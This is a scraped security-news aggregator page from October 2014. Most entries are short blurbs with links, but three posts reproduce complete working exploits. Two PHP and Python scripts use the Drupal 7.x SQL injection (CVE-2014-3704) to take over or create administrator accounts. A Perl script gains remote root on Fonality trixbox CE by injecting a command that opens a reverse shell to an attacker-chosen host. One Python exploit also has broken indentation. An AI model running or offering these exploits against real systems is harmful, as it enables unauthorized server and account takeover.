Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Forrester Research Uncovers Gaps in Mobile Certificate Security

October 16, 2014, 12:08 pm
$
0
0
The increasing reliance on mobile devices and applications is driving the need for mobile certificates to ensure that devices and applications are secure, authenticated, and encrypted for enterprise users. But failing to protect mobile certificates—to whom they are issued and when they need to be revoked—opens the door to unauthorized access, data leakage, and intellectual property theft.  The fact is that keys and certificates of all kinds, including mobile certificates, are being targeted to initiate and continue attacks every single day.

However, research published by Forrester Research uncovers that IT security professionals are not fully aware of the implications of what is required to protect mobile certificates. This creates gaps in understanding how to perform the most critical functions necessary for securing mobile certificates.

more here.............https://www.venafi.com/blog/post/forrester-research-uncovers-gaps-in-mobile-certificate-security
Search

BYPASSING ROOT DETECTION IN THREE INTOUCH

October 17, 2014, 1:24 am
$
0
0
Three recently released “InTouch”, an application for Android and iOS that allows you to use a WiFi network to send/receive phone calls and text messages, meaning that you can continue to use your phone as a phone without having a cellular network connection.

more here...........https://redfern.me/bypassing-root-detection-in-three-intouch/

SSDP Amplified Attacks, a Sitting Duck against Sophisticated DDoS Analytics

October 17, 2014, 1:25 am
$
0
0
The craftiness of cyber attackers never ceases to amaze me and now a new kid on the block has emerged – the SSDP Reflective/Amplified DDoS attack.   Many people may wonder what SSDP is.  SSDP otherwise known as the Simple Service Discovery Protocol is a network based protocol used for the advertisement and discovery of network services.

more here............http://www.securitybistro.com/?p=8965

More Free Facebook Hacking Sites Surface Online

October 17, 2014, 1:27 am
$
0
0
Four months ago, I unmasked a Facebook “hacking” service called FBSniffing and how it really doesn’t really “hack” but instead sign in users to a mobile service they never asked for.

In this post, I’ll be talking about two more sites claiming to offer hacking services that target Facebook users. The sites are:

fbwand(dot)com
hackfbaccountlive(dot)com

more here...........https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/

Machine Learning in Security Part 1: Language Model Detection in Domains

October 17, 2014, 1:28 am
$
0
0
At OpenDNS our resolvers are flooded with massive amounts of Chinese domains on a daily basis, many of which security researchers are unfamiliar with. One of the projects our team was initially tasked with was to come up with a method to filter these Chinese domains out from the rest of the traffic in order to reduce the false positive rate for our classifier algorithms and to potentially detect IPs exhibiting spamming or search engine optimization (SEO) behavior. Pinyin is the official phonetic system for transcribing Mandarin pronunciations into the Latin alphabet; it is one of the ways to represent Mandarin or Cantonese on the Internet, specifically in DNS. - See more at: http://labs.opendns.com/2014/10/16/detecting-pinyin-domains/#sthash.ny0fxqBl.dpuf

Old Adobe Vulnerability Used in Dyreza Attack, Targets Bitcoin Sites

October 17, 2014, 1:30 am
$
0
0
Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up-to-date.

We recently spotted DYREZA malware leveraging an old vulnerability found existing in Adobe Reader and Acrobat and covered under CVE-2013-2729. Accordingly, once this vulnerability is successfully exploited it could lead to the execution of arbitrary code on the affected system.

more here............http://blog.trendmicro.com/trendlabs-security-intelligence/old-adobe-vulnerability-used-in-dyreza-attack-targets-bitcoin-sites/

Backoff: propagation and possible authorship

October 17, 2014, 1:32 am
$
0
0
The Nuix Cyber Threat Analysis Team has recently discovered a piece of malware that is responsible for propagating the newly discovered Backoff point of sale (PoS) malware family. This post will describe the malware in detail, and infer potential authorship of Backoff based on details we found during analysis.

more here..........http://blog.nuix.com/2014/10/16/backoff-propagation-and-possible-authorship/

A year of Web Attacks

October 17, 2014, 1:34 am
$
0
0
My Web Honeypot reached the first year, so i decide to write a summary with some statistics.

Some informations about this Web Honeypot.
The address : http://www.malekal.com/modsec/
The attacks detections are made by modsecyrity module, all the attacks are grabed and injected in a database.
The IPs are blacklisted for one hour.


Read more at http://www.malekal.com/2014/10/17/en-a-year-of-web-attacks/#ZEMu5rvgCdC8weZd.99



Search

SHELLSHOCK: A SURVEY OF DOCKER IMAGES

October 17, 2014, 1:46 am
$
0
0
When I look at the whole Shellshock debacle I am mostly sad. Sad that one can exploit a bug in a piece of software from 1989 to hack internet-connected devices in 2014. I always have this naive hope that maybe, just maybe, not everything is hopelessly broken - which of course gets crushed every other week.

Enough ranting. This blog post is about a small research I've run last week on Docker and Shellshock. No, sorry, this is not yet another "product X is vulnerable to Shellshock if used in a dark night with a super moon" report. So, what is this about? To understand that, we need to do some homework.

more here..........http://blog.nibblesec.org/2014/10/shellshock-survey-of-docker-images.html

Application Security Economics

October 17, 2014, 2:17 am
$
0
0
When you want to buy something that you can afford, what do you do? Well if you’re like most people you go to some financial institution and take out a loan in the amount of the item you wish to purchase then go and purchase the item and enjoy it. You then have two options you can respond by paying just the interest, or you can be proactive and pay the interest plus the principal. The concept holds true for security issues in application code.

more here..........http://security.howellsonline.ca/application-security-economics/

Malware Analysis: Case Study

October 17, 2014, 5:29 am
$
0
0
In this blog we present a case-study from a recently concluded Malware Analysis.
If you would like to leverage our’s team capability on Incident Response/Malware Analysis, please get in touch.

more here...........https://www.notsosecure.com/blog/2014/10/16/malware-analysis/

Microsoft: Close means close: New adware detection criteria

October 17, 2014, 6:24 am
$
0
0
In April we introduced the rules that software developers should follow when creating advertisements to avoid being detected by Microsoft security products as adware. These rules are designed to keep our customers in control of their Internet browsing experience. Since then, we have had great success working with some companies through our developer contact process.

At the same time we have started to see other advertising programs trying to bend and even circumvent our rules. These advertisements produce a negative Windows experience and we have decided that it is time to add some new rules and clarify our stance on what defines clean advertising.

more here...........http://blogs.technet.com/b/mmpc/archive/2014/10/16/close-means-close-new-adware-detection-criteria.aspx

Drupal Core

October 17, 2014, 8:18 am
$
0
0
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>


//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Drupal Core

October 17, 2014, 8:19 am
$
0
0
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Drupal Core

October 17, 2014, 8:19 am
$
0
0
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.

import hashlib, urllib2, optparse, random, sys

# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.

class DrupalHash:

  def __init__(self, stored_hash, password):
    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    self.last_hash = self.rehash(stored_hash, password)

  def get_hash(self):
    return self.last_hash

  def password_get_count_log2(self, setting):
    return self.itoa64.index(setting[3])

  def password_crypt(self, algo, password, setting):
    setting = setting[0:12]
    if setting[0] != '$' or setting[2] != '$':
      return False

    count_log2 = self.password_get_count_log2(setting)
    salt = setting[4:12]
    if len(salt) < 8:
      return False
    count = 1 << count_log2

    if algo == 'md5':
      hash_func = hashlib.md5
    elif algo == 'sha512':
      hash_func = hashlib.sha512
    else:
      return False
    hash_str = hash_func(salt + password).digest()
    for c in range(count):
      hash_str = hash_func(hash_str + password).digest()
    output = setting + self.custom64(hash_str)
    return output

  def custom64(self, string, count = 0):
    if count == 0:
      count = len(string)
    output = ''
    i = 0
    itoa64 = self.itoa64
    while 1:
      value = ord(string[i])
      i += 1
      output += itoa64[value & 0x3f]
      if i < count:
        value |= ord(string[i]) << 8
      output += itoa64[(value >> 6) & 0x3f]
      if i >= count:
        break
      i += 1
      if i < count:
        value |= ord(string[i]) << 16
      output += itoa64[(value >> 12) & 0x3f]
      if i >= count:
        break
      i += 1
      output += itoa64[(value >> 18) & 0x3f]
      if i >= count:
        break
    return output

  def rehash(self, stored_hash, password):
    # Drupal 6 compatibility
    if len(stored_hash) == 32 and stored_hash.find('$') == -1:
      return hashlib.md5(password).hexdigest()
      # Drupal 7
    if stored_hash[0:2] == 'U$':
      stored_hash = stored_hash[1:]
      password = hashlib.md5(password).hexdigest()
    hash_type = stored_hash[0:3]
    if hash_type == '$S$':
      hash_str = self.password_crypt('sha512', password, stored_hash)
    elif hash_type == '$H$' or hash_type == '$P$':
      hash_str = self.password_crypt('md5', password, stored_hash)
    else:
      hash_str = False
    return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

def randomAgentGen():

 userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
                'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
                'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']

 UA = random.choice(userAgent)
 return UA


def urldrupal(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    # Page login
    url = url+'/?q=node&destination=node'
    return url


banner = """
  ______                          __     _______  _______ _____  
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |
 |:  1    /          |__|                 |   |  |:  1   | |:  |
 |::.. . /                                |   |  |::.. . | |::.|
 `------'                                 `---'  `-------' `---'
  _______       __     ___       __            __   __          
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                            
 |::.. . |            |::.|                                      
 `-------'            `---'                                      
                                                                 
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

              Discovered by:

              Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
                  action="store",
                  help="Insert URL: http[s]://www.victim.com",
                  )
commandList.add_option('-u', '--username',
                  action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd',
                  action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.username or not options.pwd:
    print(banner)
    print
    commandList.print_help()
    sys.exit(1)

print(banner)

host = options.target
user = options.username
password = options.pwd

hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()

target = urldrupal(host)


# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"

UA = randomAgentGen()
try:
    req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
    content = urllib2.urlopen(req).read()

    if "mb_strlen() expects parameter 1" in content:
        print "[!] VULNERABLE!"
        print
    print "[!] Administrator user created!"
    print
        print "[*] Login: "+str(user)
        print "[*] Pass: "+str(password)
        print "[*] Url: "+str(target)

    else:
        print "[X] NOT Vulnerable :("

except urllib2.HTTPError as e:

    print "[X] HTTP Error: "+str(e.reason)+" ("+str(e.code)+")"

except urllib2.URLError as e:

    print "[X] Connection error: "+str(e.reason)


//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Search

Fonality trixbox CE remote root exploit

October 17, 2014, 12:37 pm
$
0
0
#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leveraged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL = NOPASSWD: /bin/bash

# Vulnerable code:  
# Line 68: $tbLang = $_GET['lang'];
# Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang); 
#
# Note:
# We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc).
# We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued
# but anyone who thinks about installing this should think twice.
#
# Download:
http://www.morxploit.com/morxploits/morxtrix.pl
#
# Demo:
# perl trixbox.pl http://10.0.0.16 10.0.0.2 1111
#
# ===================================================
# --- Fonality trixbox remote root exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php
# [+] Sent payload! Waiting for connect back root shell ...
# [+] Et voila you are in!
#
# Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.

use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Fonality trixbox CE remote root exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}

my $host = $ARGV[0];
my $vuln = "maint/modules/home/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';

my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] MorXploiting $host/$vuln\n";

#my $payload = "sudo /bin/bash -i>%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back
my $payload = "sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";
my $exploit = $ua->get("$host/$vuln?lang=;$payload", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";

my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);

sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

ffs ssl

October 17, 2014, 1:50 pm
$
0
0
I just set up SSLTLS on my web site. Everything can be had via https://wingolog.org/, and things appear to work. However the process of transitioning even a simple web site to SSL is so clownshoes bad that it's amazing anyone ever does it. So here's an incomplete list of things that can go wrong when you set up TLS on a web site.

more here........http://wingolog.org/archives/2014/10/17/ffs-ssl

Exploiting MS14-059 because sometimes XSS is fun, sometimes

October 18, 2014, 2:01 am
$
0
0
This October, Microsoft has provided a security update for System.Web.Mvc.dll which addresses a ‘Security Feature Bypass’. The vulnerability itself is in ASP.NET MVC technology and given its wide adoption we thought we would take a closer look.
Referring to the bulletin we can glean a few useful pieces of information:
“A cross-site scripting (XSS) vulnerability exists in ASP.NET MVC that could allow an attacker to inject a client-side script into the user’s web browser… The vulnerability is caused when ASP.NET MVC fails to properly encode input.”
- See more at: http://blog.beyondtrust.com/exploiting-ms14-059-because-sometimes-xss-is-fun-sometimes#sthash.K7eESVq9.dpuf

Building Ultimate Anonymous Malware Analysis and Reverse Engineering Machine

October 18, 2014, 2:03 am
$
0
0
In this article, I'll show you my malware analysis environment and setup. I have to say that all software and configurations written in this article are totally my personal preference, this is my configuration and I like it, but please don't hesitate to share your ideas. So I'll start from very beginning: OS installation. For malware analysis, OS may vary, some malwares may only work on certain OS, so it's better to have several of them. Personally, I have XP SP3 with all updates that was available and Windows 7 x64.

more here............https://www.codeandsec.com/Building-Ultimate-Anonymous-Malware-Analysis-and-Reverse-Engineering-Machine

New attack hides stealthy Android malware in images

October 18, 2014, 2:07 am
$
0
0
A new technique that allows attackers to hide encrypted malicious Android applications inside images could be used to evade detection by antivirus products and possibly Google Play’s own malware scanner.

more here.............http://www.pcworld.com/article/2835432/new-technique-allows-attackers-to-hide-stealthy-android-malware-in-images.html

more here............https://github.com/cryptax/angeapk

and here is the angecryption tool........http://corkami.googlecode.com/svn/trunk/src/angecryption/
Viewing all 8064 articles
Browse latest View live
Search